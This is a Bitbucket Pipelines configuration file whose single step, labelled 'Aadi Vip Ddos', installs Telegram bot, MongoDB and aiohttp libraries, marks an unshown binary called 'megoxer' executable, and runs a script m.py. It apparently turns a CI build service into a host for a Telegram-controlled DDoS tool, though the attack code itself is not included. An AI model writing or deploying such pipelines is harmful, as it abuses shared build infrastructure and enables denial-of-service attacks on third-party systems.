pipelines:
  default:
    - step:
        name: AADI VIP
        image: continuumio/miniconda3
        script:
          - echo "Aadi Vip Ddos..."
          - pip install telebot pymongo aiohttp && chmod 755 megoxer && python3 m.py
